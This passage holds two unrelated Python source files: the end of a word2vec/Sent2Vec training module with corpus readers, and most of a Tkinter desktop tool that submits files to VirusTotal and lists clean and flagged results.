logger.info("skipping invalid line #%i in %s" % (line_no, questions))
if a not in ok_vocab or b not in ok_vocab or c not in ok_vocab or expected not in ok_vocab:
logger.debug("skipping line #%i with OOV words: %s" % (line_no, line))
continue
ignore = set(self.vocab[v].index for v in [a, b, c]) # indexes of words to ignore
predicted = None
# find the most likely prediction, ignoring OOV words and input words
for index in argsort(self.most_similar(positive=[b, c], negative=[a], topn=False))[::-1]:
if index in ok_index and index not in ignore:
predicted = self.index2word[index]
if predicted != expected:
logger.debug("%s: expected %s, predicted %s" % (line.strip(), expected, predicted))
break
section['correct' if predicted == expected else 'incorrect'] += 1
if section:
# store the last section, too
sections.append(section)
log_accuracy(section)
total = {'section': 'total', 'correct': sum(s['correct'] for s in sections), 'incorrect': sum(s['incorrect'] for s in sections)}
log_accuracy(total)
sections.append(total)
return sections
def __str__(self):
return "Word2Vec(vocab=%s, size=%s, alpha=%s)" % (len(self.index2word), self.layer1_size, self.alpha)
def save(self, *args, **kwargs):
kwargs['ignore'] = kwargs.get('ignore', ['syn0norm']) # don't bother storing the cached normalized vectors
super(Word2Vec, self).save(*args, **kwargs)
class Sent2Vec(utils.SaveLoad):
def __init__(self, sentences, model_file=None, alpha=0.025, window=5, sample=0, seed=1,
workers=1, min_alpha=0.0001, sg=1, hs=1, negative=0, cbow_mean=0, iteration=1):
self.sg = int(sg)
self.table = None # for negative sampling --> this needs a lot of RAM! consider setting back to None before saving
self.alpha = float(alpha)
self.window = int(window)
self.seed = seed
self.sample = sample
self.workers = workers
self.min_alpha = min_alpha
self.hs = hs
self.negative = negative
self.cbow_mean = int(cbow_mean)
self.iteration = iteration
self.sentences = {}
if model_file and sentences:
self.w2v = Word2Vec.load(model_file)
self.vocab = self.w2v.vocab
self.layer1_size = self.w2v.layer1_size
self.reset_sent_vec(sentences)
for i in range(iteration):
self.train_sent(sentences)
def reset_sent_vec(self, sentences):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
#logger.info("resetting vectors for sentences")
random.seed(self.seed)
self.sents_len = 0
for sent in sentences:
self.sentences[str(self.sents_len)] = ' '.join(s for s in sent)
self.sents_len += 1
self.sents = empty((self.sents_len, self.layer1_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in xrange(self.sents_len):
self.sents[i] = (random.rand(self.layer1_size) - 0.5) / self.layer1_size
def train_sent(self, sentences, total_words=None, word_count=0, sent_count=0, chunksize=100):
"""
Update the model's neural weights from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
#logger.info("training model with %i workers on %i sentences and %i features, "
# "using 'skipgram'=%s 'hierarchical softmax'=%s 'subsample'=%s and 'negative sampling'=%s" %
# (self.workers, self.sents_len, self.layer1_size, self.sg, self.hs, self.sample, self.negative))
if not self.vocab:
raise RuntimeError("you must first build vocabulary before training the model")
start, next_report = time.time(), [1.0]
word_count = [word_count]
sent_count = [sent_count]
total_words = total_words or sum(v.count for v in itervalues(self.vocab))
total_sents = self.sents_len * self.iteration
jobs = Queue(maxsize=2 * self.workers) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
lock = threading.Lock() # for shared state (=number of words trained so far, log reports...)
def worker_train():
"""Train the model, lifting lists of sentences from the jobs queue."""
work = zeros(self.layer1_size, dtype=REAL) # each thread must have its own work memory
neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL)
while True:
job = jobs.get()
if job is None: # data finished, exit
break
# update the learning rate before every job
alpha = max(self.min_alpha, self.alpha * (1 - 1.0 * word_count[0] / total_words))
if self.sg:
job_words = sum(self.train_sent_vec_sg(self.w2v, sent_no, sentence, alpha, work)
for sent_no, sentence in job)
else:
job_words = sum(self.train_sent_vec_cbow(self.w2v, sent_no, sentence, alpha, work, neu1)
for sent_no, sentence in job)
with lock:
word_count[0] += job_words
sent_count[0] += chunksize
elapsed = time.time() - start
if elapsed >= next_report[0]:
#logger.info("PROGRESS: at %.2f%% sents, alpha %.05f, %.0f words/s" %
# (100.0 * sent_count[0] / total_sents, alpha, word_count[0] / elapsed if elapsed else 0.0))
next_report[0] = elapsed + 1.0 # don't flood the log, wait at least a second between progress reports
workers = [threading.Thread(target=worker_train) for _ in xrange(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
def prepare_sentences():
for sent_no, sentence in enumerate(sentences):
# avoid calling random_sample() where prob >= 1, to speed things up a little:
# sampled = [self.vocab[word] for word in sentence
# if word in self.vocab and (self.vocab[word].sample_probability >= 1.0 or self.vocab[word].sample_probability >= random.random_sample())]
sampled = [self.vocab.get(word, None) for word in sentence]
yield (sent_no, sampled)
# convert input strings to Vocab objects (eliding OOV/downsampled words), and start filling the jobs queue
for job_no, job in enumerate(utils.grouper(prepare_sentences(), chunksize)):
logger.debug("putting job #%i in the queue, qsize=%i" % (job_no, jobs.qsize()))
jobs.put(job)
#logger.info("reached the end of input; waiting to finish %i outstanding jobs" % jobs.qsize())
for _ in xrange(self.workers):
jobs.put(None) # give the workers heads up that they can finish -- no more work!
for thread in workers:
thread.join()
elapsed = time.time() - start
#logger.info("training on %i words took %.1fs, %.0f words/s" %
# (word_count[0], elapsed, word_count[0] / elapsed if elapsed else 0.0))
return word_count[0]
def train_sent_vec_cbow(self, model, sent_no, sentence, alpha, work=None, neu1=None):
"""
Update CBOW model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary. Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
sent_vec = self.sents[sent_no]
if self.negative:
# precompute negative labels
labels = zeros(self.negative + 1)
labels[0] = 1.
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(self.window) # `b` in the original word2vec code
start = max(0, pos - self.window + reduced_window)
window_pos = enumerate(sentence[start : pos + self.window + 1 - reduced_window], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.syn0[word2_indices], axis=0) # 1 x layer1_size
l1 += sent_vec
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
neu1e = zeros(l1.shape)
if self.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
fa = 1. / (1. + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if self.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < self.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# model.syn0[word2_indices] += neu1e # learn input -> hidden, here for all words in the window separately
self.sents[sent_no] += neu1e # learn input -> hidden, here for all words in the window separately
return len([word for word in sentence if word is not None])
def train_sent_vec_sg(self, model, sent_no, sentence, alpha, work=None):
"""
Update skip-gram model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary. Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if self.negative:
# precompute negative labels
labels = zeros(self.negative + 1)
labels[0] = 1.0
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(sentence[start : pos + model.window + 1 - reduced_window], start):
# don't train on OOV words and on the `word` itself
if word2:
# l1 = model.syn0[word.index]
l1 = self.sents[sent_no]
neu1e = zeros(l1.shape)
if self.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[word2.point]) # 2d matrix, codelen x layer1_size
fa = 1.0 / (1.0 + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1 - word2.code - fa) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1[word2.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if self.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word2.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word2.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
# model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# model.syn0[word.index] += neu1e # learn input -> hidden
self.sents[sent_no] += neu1e # learn input -> hidden
return len([word for word in sentence if word is not None])
def save_sent2vec_format(self, fname):
"""
Store the input-hidden weight matrix in the same format used by the original
C word2vec-tool, for compatibility.
"""
logger.info("storing %sx%s projection weights into %s" % (self.sents_len, self.layer1_size, fname))
assert (self.sents_len, self.layer1_size) == self.sents.shape
with utils.smart_open(fname, 'wb') as fout:
fout.write(utils.to_utf8("%s %s\n" % self.sents.shape))
# store in sorted order: most frequent words at the top
for sent_no in xrange(self.sents_len):
row = self.sents[sent_no]
fout.write(utils.to_utf8("sent_%d %s\n" % (sent_no, ' '.join("%f" % val for val in row))))
def similarity(self, sent1, sent2):
"""
Compute cosine similarity between two sentences. sent1 and sent2 are
the indexs in the train file.
Example::
>>> trained_model.similarity(0, 0)
1.0
>>> trained_model.similarity(1, 3)
0.73
"""
return dot(matutils.unitvec(self.sents[sent1]), matutils.unitvec(self.sents[sent2]))
class BrownCorpus(object):
"""Iterate over sentences from the Brown corpus (part of NLTK data)."""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
for line in utils.smart_open(fname):
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
class Text8Corpus(object):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip ."""
def __init__(self, fname):
self.fname = fname
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
# so just split the sequence of tokens arbitrarily: 1 sentence = 1000 tokens
sentence, rest, max_sentence_length = [], b'', 1000
with utils.smart_open(self.fname) as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
sentence.extend(rest.split()) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # the last token may have been split in two... keep it for the next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(), text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= max_sentence_length:
yield sentence[:max_sentence_length]
sentence = sentence[max_sentence_length:]
class LineSentence(object):
"""Simple format: one sentence = one line; words already preprocessed and separated by whitespace."""
def __init__(self, source):
"""
`source` can be either a string or a file object.
Example::
sentences = LineSentence('myfile.txt')
Or for compressed files::
sentences = LineSentence('compressed_text.txt.bz2')
sentences = LineSentence('compressed_text.txt.gz')
"""
self.source = source
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in self.source:
yield utils.to_unicode(line).split()
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.smart_open(self.source) as fin:
for line in fin:
yield utils.to_unicode(line).split()
# Example: ./word2vec.py ~/workspace/word2vec/text8 ~/workspace/word2vec/questions-words.txt ./text8
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
logging.info("running %s" % " ".join(sys.argv))
logging.info("using optimization %s" % FAST_VERSION)
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
seterr(all='raise') # don't ignore numpy errors
if len(sys.argv) > 3:
input_file = sys.argv[1]
model_file = sys.argv[2]
out_file = sys.argv[3]
model = Sent2Vec(LineSentence(input_file), model_file=model_file, iteration=100)
model.save_sent2vec_format(out_file)
elif len(sys.argv) > 1:
input_file = sys.argv[1]
model = Word2Vec(LineSentence(input_file), size=100, window=5, min_count=5, workers=8)
model.save(input_file + '.model')
model.save_word2vec_format(input_file + '.vec')
else:
pass
program = os.path.basename(sys.argv[0])
logging.info("finished running %s" % program)
|
virustotal_scan.py
|
from virustotal_python import Virustotal
from tkinter import (
Tk,
Label,
Button,
Menu,
Canvas,
PanedWindow,
Frame,
Scrollbar,
Listbox,
Checkbutton,
)
from tkinter.filedialog import (
askdirectory,
askopenfilename,
askopenfilenames,
asksaveasfilename,
)
from tkinter.messagebox import showinfo
from tkinter.ttk import Combobox
from tkinter import (
LEFT,
RIGHT,
TOP,
BOTTOM,
HORIZONTAL,
VERTICAL,
CENTER,
X,
Y,
BOTH,
DISABLED,
NORMAL,
Toplevel,
)
from os.path import basename, isfile, getsize
from os import listdir
from time import sleep
import json, threading, virustotal_exception, datetime, pickle
from virustotal_text import about_text
from hashlib import sha256
from API_key import API_key
DEBUG = False
vtotal = Virustotal(API_key)
# care file to scan can be add multiple time
# TODO : upgrade le thread : dans stop_scan : la il att que le scan soit fini avant de tous couper: du coup ça peut prendre du temps
# TODO : la doc sphinx
class virustotal_scan(threading.Thread):
"""
A class used to scan file(s) using Virustotal Public API
Attributes
----------
init_end : bool
Flag use to enable resize event
Waiting_file_list : list, str
List of Waiting files address (files to scan)
OK_file_list : list, str
List of OK files address (file scanned)
NOK_file_list : list, str
List of NOK files address (file scanned)
main_windows : Tk
Tkinter main window
menubar :
...
ok_list : Listbox
listbox which contain ok files address
Nok_list : Listbox
listbox which contain Nok files address
Waiting_list : Listbox
listbox which contain waiting to be scanned files address
Methods
-------
show_help()
Show Help in a new windows
resize_windows(event)
Dynamically resize Frame, panedwindows width depend on main windows width
update_waiting_list(files_list_name)
Clear and update waiting_list Listbox
update_ok_list(files_list_name)
Clear and update ok_list Listbox
update_Nok_list(files_list_name)
Clear and update Nok_list Listbox
"""
def __init__(self, *args, **kwargs):
"""
Init class using tkinter to make an graphic interface
"""
super(virustotal_scan, self).__init__(*args, **kwargs)
# ====================== variables ======================
self.THREAD_IS_ACTIVE = True
self.thread_down = False
self.scan_stopped = False
self.call_start_scan = False
self.force_scan = False
self.error_log_list = list("")
self.init_end = False
self.Waiting_file_list = list("")
self.OK_file_list = list("")
self.NOK_file_list = list("")
self.Nok_file_list_scan_result_dict = dict()
self.main_widows = Tk()
# ====================== init main windows ======================
self.main_widows.protocol("WM_DELETE_WINDOW", self.close_app)
self.main_widows.title("VIRUSTOTAL SCAN")
self.main_widows.minsize(600, 480)
self.main_widows.geometry("600x500")
self.main_widows.iconbitmap(".\\img\\vt_logo.ico")
# ====================== menu top bar ======================
self.menubar = Menu(self.main_widows)
self.menu_help = Menu(self.menubar, tearoff=0)
self.menu_help.add_command(label="A propos", command=self.show_help)
self.menu_help.add_command(label="ERROR LOGS", command=self.show_error_log)
self.menubar.add_cascade(label="Aide", menu=self.menu_help)
self.menu_save = Menu(self.menubar, tearoff=0)
self.menu_save.add_command(label="Import", command=self.import_waiting_list)
self.menu_save.add_command(label="Export", command=self.export_waiting_list)
self.menubar.add_cascade(label="Save/Load", menu=self.menu_save)
self.menubar.add_command(label="Quitter", command=self.close_app)
self.menubar.add_command(label="Clear", command=self.clear_list)
self.menubar.add_command(label="Nok result", command=self.show_nok_result)
self.main_widows.config(menu=self.menubar)
# ====================== top texte ======================
self.label = Label(self.main_widows, text="Virus Total Scan")
self.label.pack()
# ====================== first panelwindow ======================
self.first_panelwindow = PanedWindow(
self.main_widows, orient=HORIZONTAL, width=self.main_widows.winfo_width()
)
self.first_panelwindow.bind("<Configure>", self.resize_windows)
self.first_panelwindow.pack(fill=X)
# ====================== OK list ======================
self.ok_list_panedwindow = PanedWindow(
self.first_panelwindow, height=200, width=100, background="ivory"
)
self.ok_list_panedwindow.grid_propagate(False)
self.ok_list_panedwindow.propagate(False)
self.ok_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(self.ok_list_panedwindow, text="File(s) clean", background="ivory").pack(
fill=X
)
self.ok_list_frame = Frame(self.ok_list_panedwindow, background="ivory")
self.ok_list_frame.pack(fill=X, padx=5, pady=5)
ok_list_scrollbar_X = Scrollbar(self.ok_list_frame, orient=HORIZONTAL)
ok_list_scrollbar_X.pack(side=TOP, fill=X)
ok_list_scrollbar_Y = Scrollbar(self.ok_list_frame, orient=VERTICAL)
ok_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.ok_list = Listbox(
self.ok_list_frame,
yscrollcommand=ok_list_scrollbar_Y.set,
xscrollcommand=ok_list_scrollbar_X.set,
)
self.ok_list.pack(side=LEFT)
ok_list_scrollbar_Y.config(command=self.ok_list.yview)
ok_list_scrollbar_X.config(command=self.ok_list.xview)
# ====================== waiting list ======================
self.Waiting_list_panedwindow = PanedWindow(
self.first_panelwindow, height=200, width=100, background="ivory"
)
self.Waiting_list_panedwindow.grid_propagate(False)
self.Waiting_list_panedwindow.propagate(False)
self.Waiting_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(
self.Waiting_list_panedwindow, text="File(s) List", background="ivory"
).pack(fill=X)
self.Waiting_list_frame = Frame(
self.Waiting_list_panedwindow, background="ivory"
)
self.Waiting_list_frame.pack(fill=X, padx=5, pady=5)
Waiting_list_scrollbar_X = Scrollbar(self.Waiting_list_frame, orient=HORIZONTAL)
Waiting_list_scrollbar_X.pack(side=TOP, fill=X)
Waiting_list_scrollbar_Y = Scrollbar(self.Waiting_list_frame, orient=VERTICAL)
Waiting_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.Waiting_list = Listbox(
self.Waiting_list_frame,
yscrollcommand=Waiting_list_scrollbar_Y.set,
xscrollcommand=Waiting_list_scrollbar_X.set,
)
self.Waiting_list.pack(side=LEFT)
Waiting_list_scrollbar_Y.config(command=self.Waiting_list.yview)
Waiting_list_scrollbar_X.config(command=self.Waiting_list.xview)
# ====================== second panelwindow ======================
self.second_panelwindow = PanedWindow(
self.main_widows, orient=HORIZONTAL, width=self.main_widows.winfo_width()
)
self.second_panelwindow.pack(fill=X)
# ====================== NOK list ======================
self.Nok_list_panedwindow = PanedWindow(
self.second_panelwindow, height=150, width=100, background="ivory"
)
self.Nok_list_panedwindow.grid_propagate(False)
self.Nok_list_panedwindow.propagate(False)
self.Nok_list_panedwindow.pack(side=LEFT, padx=5, pady=5)
Label(
self.Nok_list_panedwindow, text="File(s) unclean", background="ivory"
).pack(fill=X)
self.Nok_list_frame = Frame(self.Nok_list_panedwindow, background="ivory")
self.Nok_list_frame.pack(fill=X, padx=5, pady=5)
Nok_list_scrollbar_X = Scrollbar(self.Nok_list_frame, orient=HORIZONTAL)
Nok_list_scrollbar_X.pack(side=TOP, fill=X)
Nok_list_scrollbar_Y = Scrollbar(self.Nok_list_frame, orient=VERTICAL)
Nok_list_scrollbar_Y.pack(side=RIGHT, fill=Y)
self.Nok_list = Listbox(
self.Nok_list_frame,
yscrollcommand=Nok_list_scrollbar_Y.set,
xscrollcommand=Nok_list_scrollbar_X.set,
)
self.Nok_list.pack(side=LEFT)
Nok_list_scrollbar_Y.config(command=self.Nok_list.yview)
Nok_list_scrollbar_X.config(command=self.Nok_list.xview)
# ====================== button ======================
self.button_panedwindow = PanedWindow(
self.second_panelwindow, height=100, width=100
)
self.button_panedwindow.grid_propagate(False)
self.button_panedwindow.propagate(False)
self.button_panedwindow.pack(side=LEFT, padx=5, pady=5)
self.bouton_scan_file = Button(
self.button_panedwindow, text="Select files", command=self.select_scan_file
)
self.bouton_scan_file.grid(row=0, column=0, padx=5, pady=5)
self.bouton_scan_dir = Button(
self.button_panedwindow,
text="Select directory",
command=self.select_scan_dir,
)
self.bouton_scan_dir.grid(row=0, column=1, padx=5, pady=5)
self.bouton_delete = Button(
self.button_panedwindow, text="Delete", command=self.remove_to_waiting_list
)
self.bouton_delete.grid(row=0, column=2, padx=5, pady=5)
self.bouton_start_scan = Button(
self.button_panedwindow, text="Start scan", command=self.start_scan
)
self.bouton_start_scan.grid(row=1, column=0, padx=5, pady=5)
self.bouton_stop_scan = Button(
self.button_panedwindow,
text="Stop scan",
command=self.stop_scan,
state=DISABLED,
)
self.bouton_stop_scan.grid(row=1, column=1, padx=5, pady=5)
self.bouton_check_force_scan = Checkbutton(
self.button_panedwindow, text="Force Scan", command=self.set_force_scan
)
self.bouton_check_force_scan.grid(row=1, column=2, padx=5, pady=5)
self.curent_scan_file_label = Label(self.button_panedwindow, text="")
self.curent_scan_file_label.grid(row=3, column=0, columnspan=4, padx=5, pady=5)
# ====================== init end ======================
self.init_end = True
# start thread
self.start()
self.main_widows.mainloop()
def run(self):
"""
Thread run fonction
"""
while self.THREAD_IS_ACTIVE:
sleep(0.5)
if self.call_start_scan:
try:
self.bouton_scan_file.config(state=DISABLED)
self.bouton_scan_dir.config(state=DISABLED)
self.bouton_start_scan.config(state=DISABLED)
self.bouton_stop_scan.config(state=NORMAL)
# while not self.scan_stopped:
# if len(self.Waiting_file_list) != 0:
self.scan_file()
self.bouton_stop_scan.config(state=DISABLED)
self.bouton_start_scan.config(state=NORMAL)
self.bouton_scan_file.config(state=NORMAL)
self.bouton_scan_dir.config(state=NORMAL)
except Exception:
pass
self.thread_down = True
def show_error_log(self):
"""
Show error log in a new window
"""
error_log_windows = Toplevel(self.main_widows)
error_log_windows.title("VIRUSTOTAL SCAN : ERROR log")
error_log_windows.minsize(600, 480)
error_log_windows.geometry("600x500")
error_log_windows.iconbitmap(".\\img\\vt_logo.ico")
error_log_scrollbar_X = Scrollbar(error_log_windows, orient=HORIZONTAL)
error_log_scrollbar_X.pack(side=TOP, fill=X)
error_log_scrollbar_Y = Scrollbar(error_log_windows, orient=VERTICAL)
error_log_scrollbar_Y.pack(side=RIGHT, fill=Y)
error_log_listbox = Listbox(
error_log_windows,
yscrollcommand=error_log_scrollbar_Y.set,
xscrollcommand=error_log_scrollbar_X.set,
)
error_log_listbox.pack(fill=BOTH, padx=5, pady=5)
error_log_scrollbar_Y.config(command=error_log_listbox.yview)
error_log_scrollbar_X.config(command=error_log_listbox.xview)
for index, error_log in enumerate(self.error_log_list):
error_log_listbox.insert(index, error_log)
def show_help(self):
"""
Show Help in a new window
"""
help_windows = Toplevel(self.main_widows)
help_windows.title("VIRUSTOTAL SCAN : HELP")
help_windows.minsize(600, 480)
help_windows.geometry("600x500")
help_windows.iconbitmap(".\\img\\vt_logo.ico")
help_scrollbar_X = Scrollbar(help_windows, orient=HORIZONTAL)
help_scrollbar_X.pack(side=TOP, fill=X)
help_scrollbar_Y = Scrollbar(help_windows, orient=VERTICAL)
help_scrollbar_Y.pack(side=RIGHT, fill=Y)
help_listbox = Listbox(
help_windows,
yscrollcommand=help_scrollbar_Y.set,
xscrollcommand=help_scrollbar_X.set,
)
help_listbox.pack(fill=BOTH, padx=5, pady=5)
help_scrollbar_Y.config(command=help_listbox.yview)
help_scrollbar_X.config(command=help_listbox.xview)
for index, help in enumerate(about_text.split("\n")):
help_listbox.insert(index, help)
def show_nok_result(self):
"""
show nok result in a new widget
"""
Nok_result_windows = Toplevel(self.main_widows)
Nok_result_windows.title("VIRUSTOTAL SCAN : Nok Result")
Nok_result_windows.minsize(600, 480)
Nok_result_windows.geometry("600x500")
Nok_result_windows.iconbitmap(".\\img\\vt_logo.ico")
Nok_file_cbb = Combobox(
Nok_result_windows, state="readonly", values=self.NOK_file_list
)
Nok_file_cbb.pack(fill=X, padx=5, pady=5)
display = Label(Nok_result_windows, text="")
display.pack(fill=X, padx=5, pady=5)
Nok_file_cbb.bind(
"<<ComboboxSelected>>",
lambda event: self.update_nok_result_info(event, Nok_file_cbb, display),
)
def update_nok_result_info(self, event, combobox, label):
"""
update Nok result widget label when new value selected on combobox
"""
label_text = ""
if combobox.current() != -1:
json_recev = self.Nok_file_list_scan_result_dict[
self.NOK_file_list[combobox.current()]
]
for analys_engine in json_recev:
if str(json_recev[str(analys_engine)]["detected"]) == "True":
print(
analys_engine, " : ", json_recev[str(analys_engine)]["result"]
)
label_text += (
str(analys_engine)
+ " : "
+ str(json_recev[str(analys_engine)]["result"])
+ "\n"
)
label.config(text=label_text)
combobox.selection_clear()
def set_force_scan(self):
"""
set variable force scan
"""
self.force_scan = not self.force_scan
def clear_list(self):
"""
clear list variable
"""
self.NOK_file_list.clear()
self.OK_file_list.clear()
self.Waiting_file_list.clear()
self.update_Nok_list(self.NOK_file_list)
self.update_ok_list(self.OK_file_list)
self.update_waiting_list(self.Waiting_file_list)
def import_waiting_list(self):
"""
import a list of file to scan
"""
filename = askopenfilename(
title="Ouvrir le(s) fichier(s) pour le scan", filetypes=[("save", ".pkl")]
)
if filename != "":
try:
with open(filename, "rb") as save_file:
self.Waiting_file_list = pickle.load(save_file)
self.update_waiting_list(self.Waiting_file_list)
except Exception as ex:
print(ex)
def export_waiting_list(self):
"""
export a list of file to scan
"""
filename = asksaveasfilename(
title="save as ...", defaultextension="*.pkl", filetypes=[("save", "*.pkl")]
)
if filename != "":
try:
with open(filename, "wb") as save_file:
pickle.dump(self.Waiting_file_list, save_file, 0)
except Exception as ex:
print(ex)
def resize_windows(self, event):
"""
Dynamically resize Frame, panedwindows width depend on main windows width
Parameters
----------
event : tkinter.event
"""
if self.init_end:
new_width = (event.width / 2) - 10
padx = 10
Scrollbarsize = 50
self.ok_list_panedwindow.config(width=new_width)
self.ok_list.config(width=int((new_width - padx) - Scrollbarsize))
self.Waiting_list_panedwindow.config(width=new_width)
self.Waiting_list.config(width=int((new_width - padx) - Scrollbarsize))
self.Nok_list_panedwindow.config(width=new_width)
self.Nok_list.config(width=int((new_width - padx) - Scrollbarsize))
self.button_panedwindow.config(width=new_width)
def update_waiting_list(self, files_list_name):
"""
Clear and update waiting_list Listbox
Parameters
----------
files_list_name : list(str)
python list which contain a list of file path name (c:/example.py)
"""
self.Waiting_list.delete(0, self.Waiting_list.size())
for index, file in enumerate(files_list_name):
self.Waiting_list.insert(index, file)
def update_ok_list(self, files_list_name):
"""
Clear and update ok_list Listbox
Parameters
----------
files_list_name : list(str)
python list which contain a list of file path name (c:/example.py)
"""
self.ok_list.delete(0, self.ok_list.size())
for index, file in enumerate(files_list_name):
self.ok_list.insert(index, file)
def update_Nok_list(self, files_list_name):
"""
Clear and update Nok_list Listbox
Parameters
----------
files_list_name : list(str)
python list which contain a list of file path name (c:/example.py)
"""
self.Nok_list.delete(0, self.Nok_list.size())
for index, file in enumerate(files_list_name):
self.Nok_list.insert(index, file)
def get_all_file_in_directory(self, directory_address):
"""
get a list of all file in the directory,
this fonction is recursive, please take care of it ( avoid link file =) )
Parameters
----------
directory_address : str
Directory name ( c:/...)
"""
list_of_file = list("")
for file_name in listdir(directory_address):
dir_file = directory_address + "/" + file_name
if isfile(dir_file) == True:
list_of_file.append(dir_file)
else:
list_of_file += self.get_all_file_in_directory(dir_file)
return list_of_file
def close_app(self):
"""
"Properly" close application and stop thread
"""
_ = threading.Thread(name="stop_scan_thread", target=self.close_app_thread)
_.start()
def close_app_thread(self):
if self.call_start_scan:
self.call_start_scan = False
self.scan_stopped = False
self.bouton_stop_scan.config(state=DISABLED)
self.bouton_start_scan.config(state=DISABLED)
self.bouton_scan_file.config(state=DISABLED)
self.bouton_scan_dir.config(state=DISABLED)
self.bouton_delete.config(state=DISABLED)
while not self.scan_stopped:
self.curent_scan_file_label.config(text="Stopping scan")
sleep(0.5)
self.curent_scan_file_label.config(text="Stopping scan ...")
sleep(0.5)
self.curent_scan_file_label.config(text="")
self.THREAD_IS_ACTIVE = False
while not self.thread_down:
sleep(0.2)
self.main_widows.quit()
def select_scan_dir(self):
"""
Ask for directory and add all files in it to Waiting_file_list variable
"""
directory = askdirectory(title="Ouvrir le dossier a scaner")
if directory != "":
self.Waiting_file_list += self.get_all_file_in_directory(directory)
self.update_waiting_list(self.Waiting_file_list)
def select_scan_file(self):
"""
Ask for file(s) and add it/them to Waiting_file_list variable
"""
filename = askopenfilenames(
title="Ouvrir le(s) fichier(s) pour le scan",
filetypes=[("all files", ".*")],
)
if filename != "":
self.Waiting_file_list += filename
self.update_waiting_list(self.Waiting_file_list)
def remove_to_waiting_list(self):
"""
Remove a file from the list of waiting file
"""
try:
file_to_remove = self.Waiting_list.selection_get()
if file_to_remove != None:
self.Waiting_file_list.remove(file_to_remove)
self.update_waiting_list(self.Waiting_file_list)
except Exception as ex:
print(ex)
def stop_scan(self):
"""
Properly stop scan
"""
_ = threading.Thread(name="stop_scan_thread", target=self.stop_scan_thread)
_.start()
def stop_scan_thread(self):
"""
Properly stop scan
"""
if self.call_start_scan:
self.call_start_scan = False
self.bouton_stop_scan.config(state=DISABLED)
self.scan_stopped = False
while not self.scan_stopped:
self.curent_scan_file_label.config(text="Stopping scan")
sleep(0.5)
self.curent_scan_file_label.config(text="Stopping scan ...")
